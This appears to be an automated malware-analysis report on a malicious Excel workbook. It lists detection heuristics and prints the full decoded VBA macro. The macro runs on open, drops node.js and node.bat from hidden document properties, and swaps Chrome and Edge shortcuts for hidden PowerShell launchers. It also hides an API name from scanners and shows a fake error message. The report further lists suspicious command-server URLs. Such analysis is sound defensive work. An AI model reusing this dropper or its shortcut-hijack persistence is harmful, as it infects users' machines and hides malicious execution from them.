MALICIOUS
318
Risk Score
Heuristics 10
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
uname = Environ("USERNAME") -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://api-instance.btobwah.com/mode/scripts/get_comm_re.php In document text (OLE body)
- http://api-instance.btobwah.com/mode/scripts/api.php?action=Fcnn&instance_name=In document text (OLE body)
- http://api-instance.btobwah.com/In document text (OLE body)
- https://nodejs.org/download/release/latest-v22.x/win-x86/node.exeIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10516 bytes |
SHA-256: e6fd548db70cd7fcf96f7e9380863b016efdc8cb0d89dfee67deca1e622817b3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public chrome As Integer
Public msedge As Integer
Public cam As Integer
Public ctPath As String
Public mtPath As String
Sub ShowWMessage()
Dim message As String
Dim title As String
message = "Office has detected a problem whit this file. To help protect your computer this file cannot be opened."
title = "Microsoft Excel"
MsgBox message, vbExclamation, title
End Sub
Sub CreateRecursiveFolder_MkDir()
Dim path As String
Dim folders() As String
Dim currentPath As String
Dim i As Integer
Dim uname As String
uname = Environ("USERNAME")
path = "\.node\bin\"
folders = Split(path, "\")
currentPath = "c:\users\" + uname
For i = LBound(folders) To UBound(folders)
currentPath = IIf(currentPath = "", folders(i), currentPath & "\" & folders(i))
If Dir(currentPath, vbDirectory) = "" Then
MkDir currentPath
End If
Next i
End Sub
Sub ESBFCtots()
Dim fileComment As String
Dim byteArray() As Byte
Dim extractedBytes() As Byte
Dim filePath As String
Dim fileNumber As Integer
Dim startByte As Long
Dim byteCount As Long
Dim uname As String
Dim i As Long
Call CreateRecursiveFolder_MkDir
uname = Environ("USERNAME")
fileComment = ThisWorkbook.BuiltinDocumentProperties("Title")
If Len(fileComment) = 0 Then
Exit Sub
End If
byteArray = StringToByteArray(fileComment)
startByte = 1
byteCount = 3877
If startByte + byteCount - 1 > UBound(byteArray) Then
Exit Sub
End If
ReDim extractedBytes(byteCount - 1)
For i = 0 To byteCount - 1
extractedBytes(i) = byteArray(startByte + i - 1)
Next i
For i = 0 To UBound(extractedBytes)
If extractedBytes(i) = &HDF Then
extractedBytes(i) = &H0
End If
Next i
filePath = "C:\Users\" + uname + "\.node\bin\node.js"
fileNumber = FreeFile
Open filePath For Binary Access Write As #fileNumber
Put #fileNumber, , extractedBytes
Close #fileNumber
End Sub
Sub BFtodoc()
Dim fileComment As String
Dim byteArray() As Byte
Dim extractedBytes() As Byte
Dim filePath As String
Dim fileNumber As Integer
Dim startByte As Long
Dim byteCount As Long
Dim i As Long
fileComment = ThisWorkbook.BuiltinDocumentProperties("Comments")
If Len(fileComment) = 0 Then
Exit Sub
End If
byteArray = StringToByteArray(fileComment)
startByte = 1
byteCount = 357
If startByte + byteCount - 1 > UBound(byteArray) Then
Exit Sub
End If
ReDim extractedBytes(byteCount - 1)
For i = 0 To byteCount - 1
extractedBytes(i) = byteArray(startByte + i - 1)
Next i
For i = 0 To UBound(extractedBytes)
If extractedBytes(i) = &HDF Then
extractedBytes(i) = &H0
End If
Next i
filePath = "C:\Users\Public\Documents\node.bat"
fileNumber = FreeFile
Open filePath For Binary Access Write As #fileNumber
Put #fileNumber, , extractedBytes
Close #fileNumber
End Sub
Function StringToByteArray(str As String) As Byte()
Dim i As Integer
Dim byteArray() As Byte
ReDim byteArray(Len(str) - 1)
For i = 1 To Len(str)
byteArray(i - 1) = Asc(Mid(str, i, 1))
Next i
StringToByteArray = byteArray
End Function
Sub MDFWithS(ByVal dfPath As String)
Dim WshShell As Object
Dim shortcut As Object
Dim targetPath As String
Dim arguments As String
targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
arguments = "-w 1 -c ""saps '" + mtPath + "';C:\Users\Public\Documents\node.bat"""
Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
Set shortcut = WshShell.CreateShortcut(dfPath)
shortcut.targetPath = targetPath
shortcut.arguments = arguments
shortcut.IconLocation = mtPath
shortcut.windowStyle = 7
shortcut.Save
End Sub
Sub CDFWithS(ByVal dfPath As String)
Dim WshShell As Object
Dim shortcut As Object
Dim targetPath As String
Dim arguments As String
targetPath = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
arguments = "-w 1 -c ""saps '" + ctPath + "';C:\Users\Public\Documents\node.bat"""
Set WshShell = CreateObject("WScr" + "ipt.Sh" + "ell")
Set shortcut = WshShell.CreateShortcut(dfPath)
shortcut.targetPath = targetPath
shortcut.arguments = arguments
shortcut.IconLocation = ctPath
shortcut.windowStyle = 7
shortcut.Save
End Sub
Function FileExists(ByVal filePath As String) As Boolean
FileExists = (Dir(filePath) <> "")
End Function
Sub DFL(ByVal lPath As String)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile lPath, True
Set fso = Nothing
End Sub
Function dlkfo(ByVal fg As Integer)
Dim lps1 As String
Dim lps2 As String
Dim lps3 As String
Dim lps4 As String
Dim lps33 As String
Dim lps333 As String
Dim lps44 As String
Dim lps444 As String
Dim lps5 As String
Dim lps6 As String
Dim lps7 As String
Dim lps8 As String
Dim smpth As String
Dim sgpth As String
Dim userName As String
userName = Environ("USERNAME")
lps1 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk"
lps2 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk"
lps3 = "c:\Users\" + userName + "\Desktop\Google Chrome.lnk"
lps4 = "c:\Users\" + userName + "\Desktop\Microsoft Edge.lnk"
lps33 = "c:\Users\Public\Desktop\Google Chrome.lnk"
lps44 = "c:\Users\Public\Desktop\Microsoft Edge.lnk"
lps333 = "c:\Users\" + userName + "\Desktop\chrome - Shortcut.lnk"
lps444 = "c:\Users\" + userName + "\Desktop\msedge - Shortcut.lnk"
lps5 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"
lps6 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk"
lps7 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
lps8 = "c:\Users\" + userName + "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk"
If fg = 1 Then
If FileExists(lps1) Then
Call DFL(lps1)
End If
If FileExists(lps3) Then
Call CDFWithS(lps3)
End If
If FileExists(lps33) Then
Call DFL(lps33)
Call CDFWithS(lps3)
End If
If FileExists(lps333) Then
Call CDFWithS(lps333)
End If
If FileExists(lps5) Then
Call CDFWithS(lps5)
End If
If FileExists(lps7) Then
Call CDFWithS(lps7)
End If
ElseIf fg = 2 Then
If FileExists(lps2) Then
Call DFL(lps2)
End If
If FileExists(lps4) Then
Call MDFWithS(lps4)
End If
If FileExists(lps44) Then
Call DFL(lps44)
Call MDFWithS(lps4)
End If
If FileExists(lps444) Then
Call MDFWithS(lps444)
End If
If FileExists(lps6) Then
Call MDFWithS(lps6)
End If
If FileExists(lps8) Then
Call MDFWithS(lps8)
End If
ElseIf fg = 3 Then
If FileExists(lps1) Then
Call DFL(lps1)
End If
If FileExists(lps3) Then
Call CDFWithS(lps3)
End If
If FileExists(lps33) Then
Call DFL(lps33)
Call CDFWithS(lps3)
End If
If FileExists(lps333) Then
Call CDFWithS(lps333)
End If
If FileExists(lps5) Then
Call CDFWithS(lps5)
End If
If FileExists(lps7) Then
Call CDFWithS(lps7)
End If
If FileExists(lps2) Then
Call DFL(lps2)
End If
If FileExists(lps4) Then
Call MDFWithS(lps4)
End If
If FileExists(lps44) Then
Call DFL(lps44)
Call MDFWithS(lps4)
End If
If FileExists(lps444) Then
Call MDFWithS(lps444)
End If
If FileExists(lps6) Then
Call MDFWithS(lps6)
End If
If FileExists(lps8) Then
Call MDFWithS(lps8)
End If
End If
End Function
Sub TestFileExists()
Dim c1 As String
Dim c2 As String
Dim m1 As String
Dim m2 As String
c1 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
c2 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
m1 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
m2 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
If FileExists(c1) Then
chrome = 1
ctPath = c1
ElseIf FileExists(c2) Then
chrome = 1
ctPath = c2
Else
chrome = 0
End If
If FileExists(m1) Then
msedge = 2
mtPath = m1
ElseIf FileExists(m2) Then
msedge = 2
mtPath = m2
Else
msedge = 0
End If
cam = chrome + msedge
If cam = 0 Then
Call ShowWMessage
Exit Sub
Else
Call dlkfo(cam)
Call ESBFCtots
Call BFtodoc
Call ShowWMessage
End If
End Sub
Private Sub Workbook_Open()
Call TestFileExists
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.